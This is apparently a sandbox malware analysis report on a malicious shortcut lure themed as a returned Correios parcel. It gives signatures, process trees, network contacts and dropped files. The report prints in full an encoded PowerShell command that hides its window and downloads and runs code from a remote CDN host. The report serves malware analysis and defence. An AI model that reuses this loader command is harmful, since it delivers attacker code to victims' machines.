Analysis Overview
SHA256
f17e4e745a25bca04647fa4fc056c44835190a36d30b7cf467351ea33199bb6b
Threat Level: Known bad
The file a3894901d5099b875b8b0f7226b1904d_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-13 02:31
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-13 02:31
Reported
2024-06-13 02:34
Platform
win7-20240611-en
Max time kernel
121s
Max time network
126s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vaotr-rh.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2251.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2250.tmp"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 1361227624.rsc.cdn77.org | udp |
| GB | 89.187.167.7:443 | 1361227624.rsc.cdn77.org | tcp |
| GB | 89.187.167.7:443 | 1361227624.rsc.cdn77.org | tcp |
| GB | 195.181.164.17:443 | 1361227624.rsc.cdn77.org | tcp |
Files
\??\c:\Users\Admin\AppData\Local\Temp\vaotr-rh.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\vaotr-rh.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\CSC2250.tmp
C:\Users\Admin\AppData\Local\Temp\RES2251.tmp
C:\Users\Admin\AppData\Local\Temp\vaotr-rh.dll
C:\Users\Admin\AppData\Local\Temp\vaotr-rh.pdb
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-13 02:31
Reported
2024-06-13 02:34
Platform
win10v2004-20240508-en
Max time kernel
51s
Max time network
51s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 4392 wrote to memory of 4268 | N/A | C:\Windows\system32\cmd.exe | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4392 wrote to memory of 4268 | N/A | C:\Windows\system32\cmd.exe | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4268 wrote to memory of 2812 | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 4268 wrote to memory of 2812 | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 2812 wrote to memory of 4928 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| PID 2812 wrote to memory of 4928 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en …
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES50CF.tmp" "c:\Users\Admin\AppData\Local\Temp\4mmjhbno\CSCD60A370FA8448CE91C281C09BEDF7DF.TMP"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 1361227624.rsc.cdn77.org | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hp2wrhz3.ztt.ps1
\??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\CSCD60A370FA8448CE91C281C09BEDF7DF.TMP
C:\Users\Admin\AppData\Local\Temp\RES50CF.tmp
C:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.dll